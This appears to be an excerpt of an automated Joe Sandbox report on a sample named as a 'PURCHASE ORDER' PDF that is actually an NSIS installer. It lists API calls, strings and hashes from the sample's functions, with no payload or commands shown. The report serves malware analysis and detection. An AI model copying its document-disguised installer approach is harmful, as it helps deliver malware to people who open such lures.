CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

%ls=%ls, xrefs: 00405DF1
[Rename], xrefs: 00405E65, 00405E77
NUL, xrefs: 00405D8D

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 004045B4 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404603
SetWindowTextW.USER32(00000000,?), ref: 0040462D
SHBrowseForFolderW.SHELL32(?), ref: 004046DE
CoTaskMemFree.OLE32(00000000), ref: 004046E9
lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739

Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791

Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817

Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

A, xrefs: 004046D7

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69

Function 00402DEE Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B

Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67

Strings

soft, xrefs: 00402EDC
Inst, xrefs: 00402ED3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
Null, xrefs: 00402EE5
Error launching installer, xrefs: 00402E3E
(*B, xrefs: 00402E7C

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-2478819026
Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

Function 00406077 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 207stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
CoTaskMemFree.OLE32(?), ref: 00406220
lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-730719616
Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403138
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403161
wsprintfW.USER32 ref: 00403174

Strings

... %d%%, xrefs: 0040316E
jA, xrefs: 004031F1
jA, xrefs: 004030E7

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: jA$ jA$... %d%%
API String ID: 551687249-2167919867
Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 004062E9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373

Strings

*?|<>/":, xrefs: 0040633B

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00401767 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

